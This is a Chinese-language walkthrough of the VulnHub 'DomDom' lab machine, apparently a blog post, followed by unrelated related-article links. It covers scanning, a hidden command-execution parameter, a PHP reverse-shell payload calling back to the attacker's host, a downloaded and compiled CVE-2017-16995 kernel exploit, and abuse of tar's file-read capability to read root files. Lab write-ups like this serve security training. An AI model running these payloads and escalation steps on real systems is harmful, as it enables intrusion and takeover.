DomDom
DomDom
目录
下载地址:DomDom: 1 ~ VulnHub
1 信息收集
1.1 端口扫描
$ nmap -p - -T4 192.168.50.3 -oA domdom
Nmap scan report for test (192.168.50.3)
Host is up (0.00077s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
1.2 后台目录扫描
$ gobuster dir -u http://192.168.50.3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/04/01 20:09:53 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 694]
/admin.php (Status: 200) [Size: 329]
/server-status (Status: 403) [Size: 300]
===============================================================
2022/04/01 20:10:26 Finished
===============================================================
1.2.1 目录分析
在
http://192.168.50.3/index.php没有发现什么东东:只知道会弹回用户名在
http://192.168.50.3/admin.php也没有发现什么东东,就是有个好像可以命令执行的地方,但并没有看到有问题找度娘,发现可以将原来
http://192.168.50.3/admin.php的GET请求改为POST请求。当
http://192.168.50.3/admin.php请求体为在http://192.168.50.3/index.php提交的内容时,响应内容中多了cmd请求包
POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 49 name=id&username=id&password=123456&access=access
响应包
HTTP/1.1 200 OK
Date: Fri, 01 Apr 2022 11:48:21 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=UTF-8 <html>
<head>
<title>
DomDom
</title>
</head>
<body> <form method="POST">
<input type="text" name="cmd" id="cmd" size="200">
<br>
<br>
<input type="submit" value="Execute">
</form>
<pre>
</pre>
</body> <script>
document.getElementById("cmd").focus();
</script> </body>
</html>
2 GetShell
2.1 尝试命令执行
在
http://192.168.50.3/admin.php请求体中增加cmd参数:成功执行了命令请求包
POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56 name=id&username=id&password=123456&access=access&cmd=id
响应包
HTTP/1.1 200 OK
Date: Fri, 01 Apr 2022 11:58:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 383
Connection: close
Content-Type: text/html; charset=UTF-8 <html>
<head>
<title>
DomDom
</title>
</head>
<body> <form method="POST">
<input type="text" name="cmd" id="cmd" size="200">
<br>
<br>
<input type="submit" value="Execute">
</form>
<pre>
uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo)
</pre>
</body> <script>
document.getElementById("cmd").focus();
</script> </body>
</html>
2.2 nc反弹shell失败
POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Origin: http://192.168.50.3
Connection: close
Referer: http://192.168.50.3/admin.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
name=id&username=id&password=123456&access=access&cmd=nc+192.168.50.2+2333
2.3 PHP反弹Shell
POST /admin.php HTTP/1.1
Host: 192.168.50.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: http://192.168.50.3
Connection: close
Referer: http://192.168.50.3/admin.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
name=id&username=id&password=123456&access=access&cmd=php+-r+'$sock%3dfsockopen("192.168.50.2",2333)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'
2.4 GetShell
$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.50.2] from (UNKNOWN) [192.168.50.3] 59400
bash: cannot set terminal process group (1716): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
www-data@ubuntu:/var/www/html$
2.5 切换python Shell
python3 -c "import pty;pty.spawn('/bin/bash')"
3 提权
3.1 收集当前系统信息
查看当前用户sudo权限:没有密码
www-data@ubuntu:/var/www/html$ sudo -l
[sudo] password for www-data:
查看当前WEB应用程序目录下的文件
www-data@ubuntu:/var/www/html$ ls
admin.php index.php查看
/etc/passwd文件www-data@ubuntu:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
domom:x:1000:1000:DomDom,,,:/home/domom:/bin/bash
查看是否存在提权漏洞:
www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh
[+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2017-16995] eBPF_verifier Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 [+] [CVE-2016-8655] chocobo_root Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
利用CVE-2017-16995成功提权:
# kali中编译提权脚本
wget https://www.exploit-db.com/download/45010
mv 45010 cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995 # 将编译后的脚本cve-2017-16995上传到目标系统中
www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ scp kali@192.168.50.2:/home/kali/cve-2017-16995 .
3.3 提权
3.3.1 利用CVE-2017-16995提权
执行提权脚本成功提权
www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880231b29600
[*] Leaking sock struct from ffff880232f63c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880231682540
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880231682540
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),27(sudo),33(www-data)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/var/www/html/linux-exploit-suggester-1.1# cd ~
root@ubuntu:/root# ls
Ry{}LJRBS5nc+*V.#a
3.3.2 利用可执行文件的capabilities实现权限
查看当前系统的cap权限设置
www-data@ubuntu:/tmp$ getcap -r / 2>/dev/null
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/arping = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/bin/tar = cap_dac_read_search+ep
打包root家目录得到root的flag
www-data@ubuntu:/tmp$ tar -cvf root.tar /root
tar: Removing leading `/' from member names
/root/
/root/.viminfo
/root/.nano/
/root/.bash_history
/root/.cache/
/root/.profile
/root/.bashrc
/root/Ry{}LJRBS5nc+*V.#a
打包domom家目录得到root密码
www-data@ubuntu:/tmp$ tar -cvf domom.tar /home/domom/
www-data@ubuntu:/tmp/home/domom/Desktop$ cat README.md
Hi Dom, This is the root password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a
成功登录到root
www-data@ubuntu:/tmp/home/domom/Desktop$ su - root
su - root
Password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a root@ubuntu:~# ls
Ry{}LJRBS5nc+*V.#a
DomDom的更多相关文章
- DomDom: 1 Vulnhub Walkthrough
主机层面扫描: ╰─ nmap -p1-65535 -A -sV 10.10.202.140 You name 存在XSS 漏洞 右键源码有隐藏form表单 修改其type属性为:text 尝试了SQ ...
- JS高程3:DOM-DOM操作技术
动态脚本 加载外部脚本 方式一,直接写代码: var script = document.createElement("script"); script.type = " ...
- React入门---属性(state)-7
state------>虚拟dom------>dom 这个过程是自动的,不需要触发其他事件来调用它. state中文理解:页面状态的的一个值,可以存储很多东西. 学习state的使用: ...
- 10、QT分析之WebKit
该文章整理自 网易博客 http://blog.163.com/net_worm/blog/static/12770241920101831312381/ 转载请注明出处 WebKit是QT4新整合的 ...
- QT分析之WebKit
该文章整理自 网易博客 http://blog.163.com/net_worm/blog/static/12770241920101831312381/ 转载请注明出处 WebKit是QT4新整合的 ...
- webview综述
nWebView 是webkit最核心的一个view,WebView管理WebFrameView和WebFrame之间的交互,一个WebView对象绑定一个window,并且要求MainFrame加载 ...
- vue问题整理
生命周期面试题 1.什么是 vue 生命周期 vue 实例从创建到销毁的过程就是生命周期. 也就是从开始创建.初始化数据.编译模板.挂在 dom -> 渲染.更新 -> 渲染.卸载等一系列 ...
- jQuery学习笔记(1) 初识jQuery
目录 目录 引用 注意 HelloWorldHelloWorld! jQueryjQuery对象和DOMDOM对象的相互转换 冲突的解决 引用 本地文件引用: <script src=" ...
随机推荐
- 数电第8周周结_by_yc
基本知识: 1.有限状态机的分类: Moore型:输出仅与电路的状态有关: Mealy型:输出与当前电路状态和当前电路输入有关. 2.有限状态机的描述方法: 状态转换图:节点:状态(Moore输出): ...
- Linux系统各种库/软件版本输出指令
日常开发基于Linux系统(其实更多的是Ubuntu平台),平时总会遇到一些情况需要查看某个库或者软件的版本信息,在这里做一下简单的记录. 1. 查看glibc版本 方法一:使用ldd指令 cv@cv ...
- MySQL事务(四大特性)-存储过程
目录 一:事务 1.四大特性(ACID) 2.事物存在的必要性(真实比喻) 3.如何使用事务 4.开启事务-回滚-确认 二:事务案例实战 1.模拟消费 2.创建 3.插入数据 4.开启事务 5.修改操 ...
- LeetCode HOT 100:组合总和
题目:39. 组合总和 题目描述: 给你一个没有重复元素的数组,和一个target目标值,返回数组中可以使数字和为目标数target的所有不同组合.什么叫组合?组合就是数组中任意数字组成的集合,不需要 ...
- MySQL5.7兼容5.6
MySQL5.7兼容5.6配置----MySQL5.7以上版本数据库兼容MySQL5.5-5.6版本数据库 手动安装MySQL 8.0/5.7 需要修改配置兼容 ,修改后需要重启mysql服务 (建议 ...
- 中国风?古典系?AI中文绘图创作尝鲜!⛵
作者:韩信子@ShowMeAI 深度学习实战系列:https://www.showmeai.tech/tutorials/42 本文地址:https://www.showmeai.tech/artic ...
- Windows缓冲区溢出实验
Windows缓冲区溢出 前言 windows缓冲区溢出学习笔记,大佬勿喷 缓冲区溢出 当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被"撑暴",从而覆盖 ...
- netkit-telnet源码编译安装
介绍 Linux 下流行的 telnet 实现有两个: GNU inetutils: http://ftp.gnu.org/gnu/inetutils/ 哈佛netkit-telnet 源码包:htt ...
- Safari浏览器对SVG中的<foreignObject>标签支持不友好,渲染容易错位
在 svg 中需要写一个 markdown 编辑器,需要用到 <foreignObject> 绘制来html,编辑器选择了 simplemde.大致html部分结构如下,<markd ...
- 让Apache Beam在GCP Cloud Dataflow上跑起来
简介 在文章<Apache Beam入门及Java SDK开发初体验>中大概讲了Apapche Beam的简单概念和本地运行,本文将讲解如何把代码运行在GCP Cloud Dataflow ...